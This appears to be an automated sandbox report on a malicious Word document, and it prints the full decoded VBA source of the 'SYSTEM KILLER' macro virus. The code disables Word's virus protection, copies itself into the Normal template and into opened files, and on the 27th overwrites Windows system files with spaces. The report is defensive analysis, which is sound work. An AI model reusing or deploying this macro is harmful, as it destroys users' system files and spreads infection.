Verdict: MALICIOUS
Risk Score: 200

Malware Insights
MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is a malicious Word document containing a VBA macro named 'AutoOpen', which is a common technique for executing malicious code upon opening. The document body presents a fake payment authorization form for a hotel, aiming to deceive users into providing credit card information. The VBA script, identified as 'SYSTEM KILLER', attempts to copy itself to the Normal template, indicating an effort to establish persistence and spread.
Heuristics (4)
- ClamAV: Doc.Trojan.Alarm-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Alarm-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15067 bytes |

SHA-256: 171a0b6584c30b816abf829530d59b9e3fc8a3149d0af8d7413f360c07be4d97
Detection (ClamAV): Doc.Trojan.Alarm-1
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
'The name is SYSTEM KILLER, Version 1.0
Public Sub MAIN()
Dim MyFile$
Dim x
Dim normal
Dim OkExist
Dim i
Dim TemplateName$
Dim active
Dim internal
Dim alarmtime
Dim alarm$
On Error GoTo PassErr
Word.Options.VirusProtection = False
If Day(Now()) = 27 Then OutBreak 'SYSTEM KILLER anniversary
'MsgBox Day(Now())
'If no document is open, jump to Bye2
If Application.Documents.Count = 0 Then GoTo Bye2
'Set the document mode
Dim dlg As Object
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
'Get the file name and store it in MyFile$
MyFile$ = WordBasic.[FileName$]()
If InStr(1, MyFile$, "文档") = 1 Then
x = WordBasic.Dialog.FileSaveAs(dlg)
MyFile$ = dlg.Name
Else
WordBasic.CurValues.FileSaveAs dlg
MyFile$ = dlg.Name
End If
'If this is a macro document, jump to Bye2
If WordBasic.IsMacro(0) = -1 Then GoTo Bye2
'If this is a new document, jump to Bye1
If MyFile$ = "" Then GoTo Bye1
'Save the file in template format
If dlg.Format = 0 Then
WordBasic.FileSaveAs Name:=MyFile$, Format:=1, LockAnnot:=0, Password:="", AddToMru:=1, WritePassword:="", RecommendReadOnly:=0, EmbedFonts:=0, NativePictureFormat:=0, FormsData:=0, SaveAsAOCELetter:=0
Else
WordBasic.FileSave
End If
'Look for an AutoOpen macro in the Normal template; set OkExist=1 if found, otherwise OkExist=0
normal = WordBasic.CountMacros(0)
OkExist = 0
For i = 1 To normal
If WordBasic.[MacroName$](i, 0) = "AutoOpen" Then OkExist = 1
Next i
'Get the name of the Normal template
TemplateName$ = WordBasic.[DefaultDir$](2) + "\NORMAL.DOT"
'Copy the AutoOpen macro into the Normal template
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Tab:=3
'WordBasic.FileSaveAs Name:=TemplateName$, Format:=1, LockAnnot:=0, Password:="", AddToMru:=0, WritePassword:="", RecommendReadOnly:=0, EmbedFonts:=0, NativePictureFormat:=0, FormsData:=0, SaveAsAOCELetter:=0
End If
'Look for an AutoOpen macro in the active document; set OkExist=1 if found, otherwise OkExist=0
active = WordBasic.CountMacros(1)
OkExist = 0
For i = 1 To active
If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then OkExist = 1
Next i
'Copy the AutoOpen macro into the active template
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Tab:=3
WordBasic.FileSave
End If
'Set new-document mode
Bye1:
dlg.Format = 0
'Set a timer so the AutoOpen macro runs again
Bye2:
internal = 5 / 24 / 60 ' interval is 5 minutes of system time
alarmtime = WordBasic.TimeValue(WordBasic.[Time$]()) + internal
alarm$ = WordBasic.[Time$](alarmtime)
WordBasic.OnTime alarm$, "AutoOpen"
'On error, do nothing further in this run
PassErr:
End Sub
Private Sub OutBreak()
Const MyPath$ = "C:\WINDOWS\SYSTEM\" 'target path
Const Sorry$ = "Sorry,"
Const MacroName$ = "SYSTEM KILLER V1.0使 "
Const InYour$ = " 中,"
Const Info$ = "个文件被破坏."
Dim MyName() As String
Dim i, j
Dim FileNumber As Integer
Dim PutSpace
Dim TotalWrite As Integer
i = 1
ReDim MyName(1000)
'Find the first entry
MyName(i) = Dir(MyPath, 2) 'attribute 2 also matches hidden files
'Start the loop
Do While MyName(i) <> ""
'MsgBox MyName(i)
'Clear the file attributes
If GetAttr(MyPath & MyName(i)) <> vbNormal Then SetAttr MyPath & MyName(i), vbNormal
i = i + 1
If i >= 500 Then ReDim Preserve MyName(UBound(MyName) + 100)
'Find the next entry
MyName(i) = Dir(, 2)
Loop
FileNumber = 1
Total = 0
'Start the overwrite process
For j = 1 To i - 1
On Error GoTo ErrNext
Open MyPath & MyName(j) For Binary As #FileNumber
'Blank the file to n... spaces...
If LOF(FileNumber) < 5 Then PutSpace = 1 Else PutSpace = LOF(FileNumber) - 4 'small file
Put #FileNumber, 1, Space(PutSpace)
TotalWrite = TotalWrite + 1
Close #FileNumber
FileNumber = FreeFile()
ErrNext:
Next j
MsgBox Sorry & MacroName & MyPath & InYour & Str(TotalWrite) & Info
End Sub
' Processing file: /opt/analyzer/scan_staging/e33c4558bbc64f2380831b4c4512f297.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocum
... (truncated)